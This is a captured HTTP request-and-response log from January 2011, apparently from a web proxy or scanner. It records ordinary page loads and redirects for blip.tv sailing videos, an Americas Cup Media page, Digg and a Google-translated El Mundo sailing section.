HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:37:05 GMT Server: Apache Set-Cookie: PHPSESSID=883ef2c29bf4b113c55a2f33e2570d50; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 188402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... </span> <a href='http://www.net-folio.net/index.php?lng=en' target='_blank' class='mot2_footer'>Net-Folio</a></td> <td align='right' style='padding-right:20px;'> <a class='addthis_button' href='http://addthis.com/bookmark.php?v=250&pub=xa-4abb7f3a6673ddbf'><img src='http://s7.addthis.com/static/btn/v2/lg-share-en.gif' style='width:125px;height:16px' alt='Bookmark and Share' style='border:0'/></a><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf'></script> ...[SNIP]...
GET /posts?view=archive&nsfw=dc HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<img src="http://a.images.blip.tv/ArmchairMango-DRYSuitBecomesAWETSuit693-427.jpg" width="160" height="90" alt="DRY suit becomes a WET suit"> </a> ...[SNIP]... <a href="/file/4644899/" title="Watch DeckCam Music Version - Ft Lauderdale to Key West 2011 on SeaCart30 "Sundog"">
<img src="http://a.images.blip.tv/ArmchairMango-DeckCamMusicVersionFtLauderdaleToKeyWest2011OnSeaCart844-937.jpg" width="160" height="90" alt="DeckCam Music Version - Ft Lauderdale to Key West 2011 on SeaCart30 "Sundog""> </a> ...[SNIP]... <a href="/file/4639878/" title="Watch Sundog SeaCart 30 - Ft Lauderdale to Key West 2011 - DeckCam">
<img src="http://a.images.blip.tv/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam128-92.jpg" width="160" height="90" alt="Sundog SeaCart 30 - Ft Lauderdale to Key West 2011 - DeckCam"> </a> ...[SNIP]... <a href="/file/4590551/" title="Watch Neutrogena Sailing - Escaping the Med">
<img src="http://a.images.blip.tv/ArmchairMango-NeutrogenaSailingEscapingTheMed706-133.jpg" width="160" height="90" alt="Neutrogena Sailing - Escaping the Med"> </a> ...[SNIP]... <a href="/file/4584742/" title="Watch Neutrogena at the Start of the BWR - Sailing Anarchy">
<img src="http://a.images.blip.tv/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy274-147.jpg" width="160" height="90" alt="Neutrogena at the Start of the BWR - Sailing Anarchy"> </a> ...[SNIP]... <a href="/file/4581305/" title="Watch Happy New Year 2011 ; Annapolis Fireworks">
<img src="http://a.images.blip.tv/ArmchairMango-HappyNewYear2011AnnapolisFireworks827-245-33.jpg" width="160" height="90" alt="Happy New Year 2011 ; Annapolis Fireworks"> </a> ...[SNIP]... <a href="/file/4557362/" title="Watch Merry Christmas">
GET /comments/?attached_to=post4658178&skin=rss HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/comments/?attached_to=post4658178&skin=rss Content-Type: text/html; charset=iso-8859-1 Content-Length: 306 Date: Thu, 20 Jan 2011 00:39:02 GMT X-Varnish: 1324533104 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/comments/?attached_to=post4658178&skin=rss">here</a> ...[SNIP]...
GET /file/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:37:58 GMT X-Varnish: 1324523785 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:15 GMT X-Varnish: 1274880112 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4?source=2">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 333 Date: Thu, 20 Jan 2011 00:38:21 GMT X-Varnish: 1498215921 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4?source=2">here</a> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4?source=2">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 356 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1248904188 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4?source=2">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 330 Date: Thu, 20 Jan 2011 00:38:18 GMT X-Varnish: 1498215527 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4?source=2">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4?referrer=blip.tv&source=1&use_direct=1&ext=.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4?referrer=blip.tv&source=1&use_direct=1&ext=.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 412 Date: Thu, 20 Jan 2011 00:38:04 GMT X-Varnish: 2146042606 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4?referrer=blip.tv&source=1&use_direct=1&ext=.mp4">here</a> ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4?source=2">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&use_documents=1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&use_documents=1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 404 Date: Thu, 20 Jan 2011 00:38:00 GMT X-Varnish: 2146042109 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&use_documents=1">here</a> ...[SNIP]...
GET /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&ext=.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&ext=.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 397 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 1025263460 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v?referrer=blip.tv&source=1&use_direct=1&ext=.m4v">here</a> ...[SNIP]...
GET /file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 334 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1274879598 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2">here</a> ...[SNIP]...
GET /file/view/4639878?referrer=blip.tv&source=1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/view/4639878?referrer=blip.tv&source=1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 307 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1025266948 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/view/4639878?referrer=blip.tv&source=1">here</a> ...[SNIP]...
GET /html5/?return_url=%2F%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/html5/?return_url=%2F%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720 Content-Type: text/html; charset=iso-8859-1 Content-Length: 414 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1025272535 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/html5/?return_url=%2F%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720">here</a> ...[SNIP]...
GET /players/embed/?posts_id=4658178&skin=json&callback=EpisodePageWriter.myspaceSubmit HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/players/embed/?posts_id=4658178&skin=json&callback=EpisodePageWriter.myspaceSubmit Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:39:13 GMT X-Varnish: 1324534766 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/players/embed/?posts_id=4658178&skin=json&callback=EpisodePageWriter.myspaceSubmit">here</a> ...[SNIP]...
GET /posts/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/posts/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:39:11 GMT X-Varnish: 1025274163 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/posts/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2">here</a> ...[SNIP]...
GET /posts/?category=6&category_name=Sports HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/posts/?category=6&category_name=Sports Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:39:11 GMT X-Varnish: 2146052556 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/posts/?category=6&category_name=Sports">here</a> ...[SNIP]...
GET /posts/report_inappropriate?skin=xmlhttprequest HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/posts/report_inappropriate?skin=xmlhttprequest Content-Type: text/html; charset=iso-8859-1 Content-Length: 306 Date: Thu, 20 Jan 2011 00:39:10 GMT X-Varnish: 1025273889 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/posts/report_inappropriate?skin=xmlhttprequest">here</a> ...[SNIP]...
GET /users/blogging_info?posts_id=4658178&no_wrap=1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/users/blogging_info?posts_id=4658178&no_wrap=1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 325 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 1248909158 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/blogging_info?posts_id=4658178&no_wrap=1">here</a> ...[SNIP]...
GET /users/login/?return_url=/%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/users/login/?return_url=/%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720 Content-Type: text/html; charset=iso-8859-1 Content-Length: 403 Date: Thu, 20 Jan 2011 00:38:50 GMT X-Varnish: 1248909016 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/login/?return_url=/%3Ffile_type%3Dflv%3Bsort%3Ddate%3Bdate%3D%3Bid%3D4639878%3Bs%3Dfile%3Brole%3DBlip%2520SD%252C%2520Blip%2520HD%2520720">here</a> ...[SNIP]...
GET /submit?phase=2&url=http://blip.tv/file/4639878/&title=Sundog%20SeaCart%2030%20-%20Ft%20Lauderdale%20to%20Key%20West%202011%20-%20DeckCam HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title>
<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics ...[SNIP]... <meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">
GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/nautica.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgbghhSU0mR1pBT2WU73fJ07Tz9LA HTTP/1.1 Host: translate.googleusercontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PREF=ID=4d976405d4b1f367:TM=1295482589:LM=1295482590:S=snr5DTM1C3a-1gdp;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:12 GMT Expires: Thu, 20 Jan 2011 00:44:12 GMT Cache-Control: private, max-age=86400 Accept-Ranges: none Content-Location: http://www.elmundo.es/elmundo/nautica.html Content-Type: text/html; charset=UTF-8 Content-Language: en X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function ti_a(b){this. ...[SNIP]... <meta http-equiv="X-Translated-By" content="Google"><base href=http://www.elmundo.es/elmundo/nautica.html /><meta http-equiv=Content-Type content="text/html; charset=UTF-8" /> ...[SNIP]... </title><link rel=icon href=http://estaticos02.cache.el-mundo.net/favicon.ico type=image/ico /><link rel="shortcut icon" href=http://estaticos03.cache.el-mundo.net/favicon.ico type=image/ico /><meta name=lang content=es /> ...[SNIP]... <meta http-equiv=Pragma content=no-cache /><link rel=stylesheet href=http://estaticos01.cache.el-mundo.net/elmundo/estilos/v5.x/v5.02/comun.css type=text/css media=all /><link rel=stylesheet href=http://estaticos02.cache.el-mundo.net/elmundo/estilos/v5.x/v5.02/portada.css type=text/css media=all /><!--[if IE]> ...[SNIP]... <![endif]--><script type=text/javascript src=http://estaticos.elmundo.es/js/accordian.js></script><script type=text/javascript src=http://estaticos.elmundo.es/js/pestanas_portal.js></script> ...[SNIP]... </script><link rel=alternate title="RSS elmundo.es (n &autica; Dosage)" href=http://estaticos01.cache.el-mundo.net/elmundo/rss/nautica.xml type=application/rss+xml /></head><body id=nautica class=portadilla><iframe src="http://translate.google.com/translate_un?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/nautica.html&prev=_t&rurl=translate.google.com&lang=es&usg=ALkJrhinz45IDXjOoWxQBJwcPxxSD3zpZA" width=0 height=0 frameborder=0 style="width:0px;height:0px;border:0px;"></iframe><div id=pixelcontabilizacionelmundo style=position:absolute;top:0px;left:0px;width:1px;height:1px;z-Index:1><img src=http://pixelcounter.elmundo.es/pixelcontabilizacion/pixelcontabilizacion.gifctl?r=http%3A%2F%2Fwww%2Eelmundo%2Ees%2Felmundo%2Fnautica%2Ehtml&s=elmundo&d=TTeFXMCoFCEAABXoAZY width=1 height=1 alt="" /><!-- START Nielsen//NetRatings SiteCensus V5.3 --> ...[SNIP]... </script><script type=text/javascript src=http://active.cache.el-mundo.net/js/nielsen.js></script><noscript><div><img src=http://secure-uk.imrworldwide.com/cgi-bin/m?ci=es-ueditorial&cg=0&cc=1 alt="" /></div> ...[SNIP]... </div><script type=text/javascript language=JavaScript src=http://estaticos.elmundo.es/js/comunes.js></script> ...[SNIP]... <span class="google-src-text" style="direction: ltr; text-align: left"><a title="Follow us on facebook" href=http://www.facebook.com/mundo.es>facebook</a></span> <a title="Follow us on facebook" href=http://www.facebook.com/mundo.es>facebook</a> ...[SNIP]... e_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/18/nautica/1295349875.html&prev=_t&rurl=translate.google.com&usg=ALkJrhhfx7ZFZMnumIxLz40bAA9FyvblSw><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/18/nautica/1295349875_extras_portadilla_1.jpg border=0 width=390 height=193 alt="El barco Mapfre de Iker Mart..nez y Xabi Fern..ndez. | Mar..a 